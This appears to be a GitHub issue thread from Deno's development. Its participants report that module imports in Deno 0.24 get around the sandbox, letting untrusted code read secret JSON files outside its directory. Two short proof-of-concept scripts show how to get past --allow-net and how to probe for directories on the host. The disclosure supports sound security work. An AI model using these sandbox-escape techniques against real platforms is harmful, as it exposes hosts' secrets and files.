In the current version of Deno (0.24) it is possible to import a module from outside the directory of the running script:
import * as secrets from "../../../elsewhere/config.json";
My understanding is that this is justified because a malicious script can not know where it is going to be run and therefore an attempt to load a relative path as above will almost always result in Deno exiting with an error.
Although it's true that in some uses of Deno a malicious script author can not know where a json with secrets might be located relative to where it is run, there is one situation where this can be known: if Deno is used as the sandbox subsystem of a larger system, then Deno will always be called in the same way (predictable cwd and path to potential secrets).
Imagine for example an application platform that uses Deno as its sandbox. It has the following data directory:
- data-dir
| - config.json // includes api keys and other secrets
| - more stuff.../
| - untrusted-app-code/
| - malicious-app/
The application platform would probably call Deno with very limited permissions, and it certainly will not provide an allow-read
permission that includes config.json.
However the malicious app will not need that. If it's designed to run on the platform it can read config.json
like this:
import * as platform_config from '../../config.json`
I believe Deno should disallow relative static imports outside of the main script's directory unless --allow-read
allows it.
Thanks,
鉁岋笍
Yes it's a good point. If we are to take security seriously we can't allow reading random JSON...
I would say instead it might be more reasonable to require --allow-read
for JSON imports (since they are data)
(I remember hearing Myles saying something about JSON imports support being blocked in browsers)
--allow-read
makes sense for JSON imports. Is there a difference in local or remote? --allow-read
implies local only. We should consider passing it to the TS compiler too so it can set allowJson on the compiler config.
(I remember hearing Myles saying something about JSON imports support being blocked in browsers)
I think the relevant thread is: https://github.com/w3c/webcomponents/issues/839
Btw, in case you'd like to weigh in, there's a proposal coming out of this that could be of interest to deno as well. Looks like _module attributes_ could serve as a mechanism to pass permissions.
@kevinkassimo --allow-read
for JSON imports seems reasonable , since this is basically an easier way to read data (plus some type info as a bonus). @kitsonk yeah, --allow-read
implies local but for remote JSON imports I would expect to need --allow-net
for the same reason.
Update: I mean I would want to know that my program is "importing" a random JSON API or something.
Also, I see two other arguments for requiring --allow-net
for remote JSON imports:
Thinking about CORS analogy, @ry do you think that importing JSON by a module in the same directory, i.e. import * as x from "./bare-file-name.json";
should be allowed by default with --allow-read
/--allow-net
required for other directories than "./"
? (not just other outside with ".."
but also other inside to avoid problems with symlinks linking to directories outside).
(I remember hearing Myles saying something about JSON imports support being blocked in browsers)
There is a really interesting "HTTP 203" episode where they get into imports from the browser and in particular why JSON import was dropped.
https://www.youtube.com/watch?v=jG7VfbqqTGw
I would say instead it might be more reasonable to require --allow-read for JSON imports (since they are data)
I think a local import of any type (JS/TS/WASM/JSON/CSS/...) that is outside the root of the script (meaning: it probably wasn't downloaded along with the script) should require an --allow-read
permission.
Even if JS/TS are "just code" usually and will be limited by the permissions given to the called script, that's not a reason to give a script the ability to execute them and get their results.
JS can be data too: think of webpack.conf.js
.
Another advantage is that this way static and dynamic local imports are beholden to the same rules, which makes things easier to reason about.
In the end, since Deno is meant to be safe a script should have only the most limited set of default permissions to run. Being able to import a JS from outside its directory is not a good default.
Just my 0.02
Any real-world app is going to need the ability to import a file from a sibling directory. How do you decide where the module's root is, anyway? In Node, it's easy because you can just look upwards in the filesystem until you find a package.json. I guess in Deno, the best we could do is use the directory of the entry point. But that wouldn't work for all project structures, such as files in bin
loading files from lib
, which is a common pattern in Node.
I guess in Deno, the best we could do is use the directory of the entry point.
I think that's the idea.
But that wouldn't work for all project structures, such as files in bin loading files from lib, which is a common pattern in Node.
I would think Deno projects would be structured so that all files necessary for code to run will be at or below the entry-point.
That import
isn't routed through the general access checks is concerning. Makes me wonder: what else isn't?
You can also bypass --allow-net
:
poc.js
:
const encoder = new TextEncoder();
Deno.writeFileSync("/tmp/make-request.ts",
encoder.encode("import * as foo from 'http://example.com/foobar'"));
while (true) {
try {
await import('/tmp/make-request.ts');
} catch (e) {}
}
% deno --allow-read=/tmp --allow-write=/tmp poc.js
Compile file:///tmp/include.ts
Download http://example.com/foobar
Compile file:///tmp/include.ts
Download http://example.com/foobar
Compile file:///tmp/include.ts
Download http://example.com/foobar
Compile file:///tmp/include.ts
Download http://example.com/foobar
Compile file:///tmp/include.ts
Download http://example.com/foobar
...
(Sure, it's only a DoS-ish / timing attack thing, but still...)
Also, it's not enough to just solve JSON. You can also check for existence of directories outside of your sandbox:
poc2.js
:
const encoder = new TextEncoder();
async function dir_exists(path) {
const tmpFile = '/tmp/' + Math.random() + '.ts'
Deno.writeFileSync(tmpFile, encoder.encode(`import * as foo from '${path}'`));
try {
await import(tmpFile);
} catch (e) {
return e.message.includes('Is a directory');
}
}
console.log('jaka', await dir_exists('/Users/jaka'));
console.log('mike', await dir_exists('/Users/mike'));
% deno --allow-read=/tmp --allow-write=/tmp po2c.js
Compile file:///tmp/0.05196201107122267.ts
jaka true
Compile file:///tmp/0.8575097111751213.ts
mike false
I propose everything is just made explicit and require --allow-read
to the source directory.
I would also require --allow-net
for import from internet.
Without any arguments, it should be as secure as a stock V8 or a browser.
All fs/net access should be centrally routed, or some contributor in 1 year will introduce a vuln.
For a real non-sanboxed app, you'll need a wrapper anyways (shebang doesn't work for anything non-trivial, e.g. you can't specify a relative importmap). Only thing affected will be the sexy one-liners.
Meanwhile, the other way, securing things if defaults are loose, is nearly impossible.
@jakajancar Good example - this is a problem.
What if alternatively we required a special flag for dynamic imports?
This look like a bug in implementation of TS compiler, we explicitly check each dynamic import from V8 for permissions; either read or net, depending on scheme. In provided example request is made by TS compiler which is priviledged and doesn't check permissions for downloaded files; we should change that.
The same could happen in JS. You write a file with a static URL import, then dynamically import that file. This allows a request to be made to a dynamically defined URL without --allow-net
.
So TS compiler runs outside the sandbox?
The same could happen in JS. You write a file with a static URL import, then dynamically import that file. This allows a request to be made to a dynamically defined URL without
--allow-net
.
No, V8 will call ModuleLoader.load()
with dynamic_import
argument set to true for each recursive module, so it will properly check permissions for remote module.
So TS compiler runs outside the sandbox?
TS compiler is run in a separate isolate and thus separate thread. It is considered priviledged because it can load source files and write to disk cache. It looks like case of dynamic import was not covered with permission check, but it should be an easy fix with example you provided 馃憤
I don't think it is a loophole in TypeScript. Something like import(tmpFile)
doesn't actually get analysed by the TypeScript compiler, because it cannot be statically determined what is happening with the dynamic import. It is true if a dynamic import can be statically determined, the TypeScript compiler will request it as a module to analyse its type information, and I don't believe we can determine that easily, but it _should_ still follow the same process when being injected into the isolate though as other dynamic imports()
.
Looking at the example, it is a .js
file which then is trying to dynamic import a .ts
file which then gets loaded by the compiler, and effectively gets into an infinite loop for loading files for dependency analysis, which bring in a JavaScript file, which brings in the TypeScript file, which brings in the JavaScript file.
The fix would be to keep a set of dependencies and short circuit the cyclical nature of the importing. I will try to fix it today/tomorrow.
I don't see an infinite loop in my example. I just put a while (true)
loop there to indicate a DoS. Without it, it terminates just fine.
Ok, then, the problem isn't with the compiler per-say @bartlomieju. It appears to be with a dynamic import, we aren't properly awaiting the compilation to complete and updating the cache. Because it should compile once, and then be a cache hit every subsequent import.
Any while (true)
is a potential DoS, irrespective of it doing something else.
Could these recent findings be moved to their own issue? Thanks.
@teleclimber Yes, these are very different and important issues. I created https://github.com/denoland/deno/issues/4383 for the --allow-net
bypass problem.
Closed in #5037
Most helpful comment
I would say instead it might be more reasonable to require
--allow-read
for JSON imports (since they are data)(I remember hearing Myles saying something about JSON imports support being blocked in browsers)